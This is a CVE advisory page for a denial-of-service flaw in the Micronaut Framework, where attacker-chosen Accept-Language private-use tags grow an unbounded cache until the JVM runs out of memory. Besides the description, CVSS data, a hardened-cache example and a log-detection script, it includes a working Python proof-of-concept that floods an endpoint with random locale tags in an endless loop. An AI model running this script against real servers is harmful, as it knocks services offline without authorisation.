Security Vulnerability Report
CVE-2026-44241 CVSS 7.5 HIGH

CVE-2026-44241

Published: 2026-05-12 22:16:35
Last Modified: 2026-05-12 22:16:35

Description

Micronaut Framework is a JVM-based full stack Java framework designed for building modular, easily testable JVM applications. From 4.3.0 to before 4.10.22, TimeConverterRegistrar caches DateTimeFormatter instances in an unbounded ConcurrentHashMap<String, DateTimeFormatter> whose key is derived from the @Format annotation pattern concatenated with the locale from the HTTP Accept-Language header. Because Locale.forLanguageTag() accepts arbitrary BCP 47 private-use extensions (en-x-a001, en-x-a002, …), an unauthenticated attacker can generate an unlimited number of unique cache keys by sending requests with novel locale tags, growing the cache until heap memory is exhausted and the JVM crashes. This vulnerability is fixed in 4.10.22.
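The failure described above is a cache whose key contains an attacker-controlled string of unbounded cardinality. The following Python model is an added example, not Micronaut's code and not the change shipped in 4.10.22 (that is in the linked release): it places the vulnerable shape (raw Accept-Language value in the key, no size limit) beside a hardened shape that first negotiates the header down to one of a fixed set of supported locales and then caps the cache with LRU eviction. The supported locale list, the default locale, the cache size and the `object()` placeholders standing in for DateTimeFormatter instances are all assumptions made for the illustration.

```python
import re
from collections import OrderedDict

# Assumption: the application only ever formats dates for this fixed set of locales.
SUPPORTED_LOCALES = ("en", "en-US", "de", "fr", "ja")
DEFAULT_LOCALE = "en"
MAX_CACHE_ENTRIES = 256


class UnboundedFormatterCache:
    """Models the vulnerable shape: the raw Accept-Language value is part of the
    key and the map grows without limit (the Java code used a ConcurrentHashMap)."""

    def __init__(self):
        self._cache = {}

    def get(self, pattern, accept_language):
        key = f"{pattern}|{accept_language}"
        if key not in self._cache:
            # Stands in for DateTimeFormatter.ofPattern(pattern, locale).
            self._cache[key] = object()
        return self._cache[key]

    def size(self):
        return len(self._cache)


# Loose BCP 47 shape check: a language subtag followed by 1-8 character subtags.
_BCP47_TAG = re.compile(r"^[A-Za-z]{2,8}(-[A-Za-z0-9]{1,8})*$")


def negotiate_locale(accept_language):
    """Map a client-supplied Accept-Language header onto SUPPORTED_LOCALES.
    Ranges are tried in header order (q-values are ignored, a simplification);
    each range is truncated subtag by subtag ("en-x-a001" -> "en") until it
    matches a supported locale. Anything unmatched falls back to DEFAULT_LOCALE,
    so the set of possible return values is finite whatever the client sends."""
    supported = {loc.lower(): loc for loc in SUPPORTED_LOCALES}
    for part in accept_language.split(","):
        tag = part.split(";")[0].strip()
        if not _BCP47_TAG.match(tag):
            continue
        subtags = tag.split("-")
        while subtags:
            candidate = "-".join(subtags).lower()
            if candidate in supported:
                return supported[candidate]
            subtags.pop()
    return DEFAULT_LOCALE


class BoundedFormatterCache:
    """Hardened shape: the key uses the negotiated locale (finite key space), and
    the cache is an LRU with a hard size cap as a second line of defence."""

    def __init__(self, max_entries=MAX_CACHE_ENTRIES):
        self._cache = OrderedDict()
        self._max = max_entries

    def get(self, pattern, accept_language):
        key = f"{pattern}|{negotiate_locale(accept_language)}"
        if key in self._cache:
            self._cache.move_to_end(key)
            return self._cache[key]
        if len(self._cache) >= self._max:
            self._cache.popitem(last=False)  # evict the least recently used entry
        self._cache[key] = object()
        return self._cache[key]

    def size(self):
        return len(self._cache)


def attack_tags(n):
    """Distinct private-use tags of the form the advisory describes (en-x-a001, ...)."""
    return [f"en-x-a{i:03d}" for i in range(n)]


def entries_after(cache, tags, pattern="yyyy-MM-dd"):
    """Feed one request per tag through the cache and report how many entries it holds."""
    for tag in tags:
        cache.get(pattern, tag)
    return cache.size()


if __name__ == "__main__":
    n = 1000
    print("unbounded:", entries_after(UnboundedFormatterCache(), attack_tags(n)))  # grows with n
    print("bounded:  ", entries_after(BoundedFormatterCache(), attack_tags(n)))    # stays at 1
```

In Java the negotiation step corresponds to `Locale.lookup(Locale.LanguageRange.parse(header), availableLocales)` against a fixed list of locales the application actually supports; the point is that the locale reaching the cache key must come from that finite list, never from the header verbatim, and that the cache should be bounded regardless.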

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No CPE configuration data is available yet (the record status is "Received"); the affected range below is taken from the description.

Micronaut Framework >= 4.3.0, < 4.10.22

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
    import random
    import string

    import requests


    def generate_random_locale():
        # Generate a random private-use extension tag (e.g., en-x-{random}).
        # Locale.forLanguageTag() accepts any 1-8 character alphanumeric private-use
        # subtag, so each new value becomes a new cache key.
        random_suffix = ''.join(random.choices(string.ascii_lowercase + string.digits, k=5))
        return f"en-x-{random_suffix}"


    def exploit(url):
        headers = {
            # Target the Accept-Language header to trigger the cache key generation
            'Accept-Language': generate_random_locale(),
            'User-Agent': 'CVE-2026-44241-PoC'
        }
        try:
            print(f"Sending request with locale: {headers['Accept-Language']}")
            response = requests.get(url, headers=headers, timeout=5)
            print(f"Response status: {response.status_code}")
        except requests.exceptions.RequestException as e:
            print(f"Request failed: {e}")


    if __name__ == "__main__":
        # The endpoint must bind a temporal parameter carrying an @Format annotation;
        # the cache key is the annotation's pattern plus the request locale, so a
        # route without such a parameter caches nothing.
        target_url = "http://localhost:8080/api/date"
        print("Starting DoS attack via unbounded cache...")
        while True:
            exploit(target_url)
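On the defensive side, the traffic the PoC produces has a distinctive shape: one source sending many distinct Accept-Language values containing a private-use (`-x-`) subtag. The following detection script is an added example, not part of the advisory or of any vendor tooling; it parses constructed combined-log-format lines with the Accept-Language header appended as the last quoted field (an assumption about your logging configuration) and flags sources whose count of distinct private-use tags exceeds a threshold. It counts distinct tags rather than requests, since a legitimate client sends the same header on every request.

```python
import re
from collections import defaultdict

# Constructed sample data: combined log format with the Accept-Language header
# logged as the final quoted field. 10.0.0.5 cycles through private-use tags as
# the PoC does; the other two sources are ordinary clients.
SAMPLE_LOG = """\
10.0.0.5 - - [12/May/2026:10:00:01 +0000] "GET /api/date HTTP/1.1" 200 17 "en-x-a001"
10.0.0.5 - - [12/May/2026:10:00:01 +0000] "GET /api/date HTTP/1.1" 200 17 "en-x-a002"
10.0.0.5 - - [12/May/2026:10:00:01 +0000] "GET /api/date HTTP/1.1" 200 17 "en-x-a003"
10.0.0.5 - - [12/May/2026:10:00:02 +0000] "GET /api/date HTTP/1.1" 200 17 "en-x-a004"
10.0.0.5 - - [12/May/2026:10:00:02 +0000] "GET /api/date HTTP/1.1" 200 17 "en-x-a005"
10.0.0.5 - - [12/May/2026:10:00:02 +0000] "GET /api/date HTTP/1.1" 200 17 "en-x-a006"
192.0.2.9 - - [12/May/2026:10:00:03 +0000] "GET /api/date HTTP/1.1" 200 17 "de-CH,de;q=0.9,en;q=0.8"
192.0.2.9 - - [12/May/2026:10:00:04 +0000] "GET /api/date HTTP/1.1" 200 17 "en-US,en;q=0.5"
198.51.100.7 - - [12/May/2026:10:00:05 +0000] "GET /api/date HTTP/1.1" 200 17 "en-x-a001"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<accept_language>[^"]*)"$'
)

# A private-use subtag: "x-" at the start of the tag or after a hyphen.
PRIVATE_USE = re.compile(r"(?:^|-)x-[A-Za-z0-9]{1,8}", re.IGNORECASE)


def tags_from_header(value):
    """Split an Accept-Language value into its language ranges, dropping q-values."""
    return [part.split(";")[0].strip() for part in value.split(",") if part.strip()]


def suspicious_sources(log_text, threshold=5):
    """Return {ip: distinct_private_use_tag_count} for sources at or above threshold."""
    distinct = defaultdict(set)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; not this detector's concern
        for tag in tags_from_header(m["accept_language"]):
            if PRIVATE_USE.search(tag):
                distinct[m["ip"]].add(tag.lower())
    return {ip: len(tags) for ip, tags in distinct.items() if len(tags) >= threshold}


if __name__ == "__main__":
    for ip, count in suspicious_sources(SAMPLE_LOG).items():
        print(f"{ip}: {count} distinct private-use Accept-Language tags")
```

The threshold is an assumption to tune per environment; the same distinct-count logic works unchanged as a streaming rule keyed on source IP (or on a client fingerprint when the attacker spreads requests across addresses).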

References

https://github.com/micronaut-projects/micronaut-core/releases/tag/v4.10.22
https://github.com/micronaut-projects/micronaut-core/security/advisories/GHSA-8hjv-92q9-g4xj

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-44241", "sourceIdentifier": "[email protected]", "published": "2026-05-12T22:16:35.473", "lastModified": "2026-05-12T22:16:35.473", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Micronaut Framework is a JVM-based full stack Java framework designed for building modular, easily testable JVM applications. From 4.3.0 to before 4.10.22, TimeConverterRegistrar caches DateTimeFormatter instances in an unbounded ConcurrentHashMap<String, DateTimeFormatter> whose key is derived from the @Format annotation pattern concatenated with the locale from the HTTP Accept-Language header. Because Locale.forLanguageTag() accepts arbitrary BCP 47 private-use extensions (en-x-a001, en-x-a002, …), an unauthenticated attacker can generate an unlimited number of unique cache keys by sending requests with novel locale tags, growing the cache until heap memory is exhausted and the JVM crashes. This vulnerability is fixed in 4.10.22."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-400"}]}], "references": [{"url": "https://github.com/micronaut-projects/micronaut-core/releases/tag/v4.10.22", "source": "[email protected]"}, {"url": "https://github.com/micronaut-projects/micronaut-core/security/advisories/GHSA-8hjv-92q9-g4xj", "source": "[email protected]"}]}}